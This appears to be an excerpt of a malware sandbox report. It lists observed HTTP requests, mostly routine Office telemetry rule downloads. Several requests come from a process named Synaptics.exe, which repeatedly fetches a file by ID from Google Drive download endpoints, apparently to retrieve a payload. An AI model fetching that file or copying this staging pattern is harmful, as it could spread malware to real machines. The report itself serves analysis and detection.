                              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
